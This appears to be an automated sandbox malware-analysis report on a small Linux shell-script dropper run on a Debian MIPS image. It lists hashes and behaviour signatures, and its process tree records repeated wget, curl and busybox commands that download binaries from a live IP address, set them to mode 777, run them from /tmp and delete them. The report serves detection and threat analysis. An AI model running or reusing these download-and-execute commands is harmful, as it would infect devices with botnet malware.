Analysis
-
max time kernel
79s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 976 chmod 843 chmod 898 chmod 922 chmod 853 chmod 940 chmod 964 chmod 904 chmod 910 chmod 952 chmod 982 chmod 805 chmod 868 chmod 874 chmod 742 chmod 748 chmod 970 chmod 928 chmod 934 chmod 946 chmod 783 chmod 880 chmod 916 chmod 811 chmod 958 chmod 859 chmod 886 chmod 892 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 743 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 749 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 785 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 806 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 812 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 845 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 854 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 860 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 869 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 875 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 881 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 887 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 893 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 899 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 905 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 911 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv 917 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA 923 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS 929 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 935 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF 941 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 947 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 953 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 959 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 965 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 971 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 977 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 983 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv curl File opened for modification /tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8 curl File opened for modification /tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF curl File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:716
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:741
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:744
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:745
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:747
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:750
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:751
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:770
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:788
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:790
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:804
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:807
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:808
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:810
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:837
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:850
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:852
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:858
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:867
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:870
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:871
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:873
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:876
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:877
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:879
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:885
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:891
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:897
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:903
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:909
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:915
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:919
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:921
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:924
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:925
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:927
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:930
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:931
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:933
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:936
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:939
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:942
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:943
-
-
